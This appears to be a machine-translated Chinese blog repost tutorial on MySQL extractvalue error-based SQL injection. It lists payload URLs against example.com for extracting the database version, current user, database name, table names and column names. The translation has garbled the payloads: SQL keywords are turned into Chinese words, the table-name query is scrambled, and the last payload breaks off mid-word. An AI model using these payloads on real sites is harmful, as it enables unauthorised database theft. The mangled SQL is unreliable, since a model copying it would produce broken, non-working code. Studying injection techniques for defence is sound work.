【漏洞挖掘】——107、Extractvalue报错注入刨析,注入类漏洞包括

【漏洞挖掘】——107、Extractvalue报错注入刨析Extractvalue报错注入流程
下面的语句不可以直接使用,首先需要刻画后台SQL语句的\”画像\”,之后确定如何构造,例如使用“/?id=1 and 语句”还是“/?id=1\’

Extractvalue报错注入流程

以下语句不能直接使用。首先,您需要编写后台SQL 语句的“肖像”,然后决定如何构造它们,例如使用“/?id=1 和语句”或“/?id=”。 1\’和语句\’\’以及其他类型的语句。陈述。

获取数据库版本信息

http://www.example.com/?id=1 和extractvalue(1, concat(0x7e, (select @@version),0x7e)) –+

获取用户名相关信息

http://www.example.com/?id=1 和extractvalue(1, concat(0x7e, (select user()),0x7e)) –+

获取数据库名的信息

http://www.example.com/?id=1 和extractvalue(1, concat(0x7e, (选择数据库()),0x7e)) –+

获取数据库的表信息

http://www.example.com/?id=1 和extractvalue(1, concat(0x7e, (TABLE_SCHEMA=database() limit 0,1),Select TABLE_NAME from information_schema.TABLES in0x7e)) –+

实际使用时,需要更改limit start和length的起始值,才能获取当前数据库中的所有表名信息。

获取指定表的字段名

http://www.example.com/?id=1 和extractvalue(1, concat(0x7e, (选择COLUMN_NAME f))

#【漏洞挖掘】——107及以上Extractvalue错误注入分析相关内容来源网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91290.html

(0)
CSDN的头像CSDN
上一篇 2024年6月21日
下一篇 2024年6月21日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注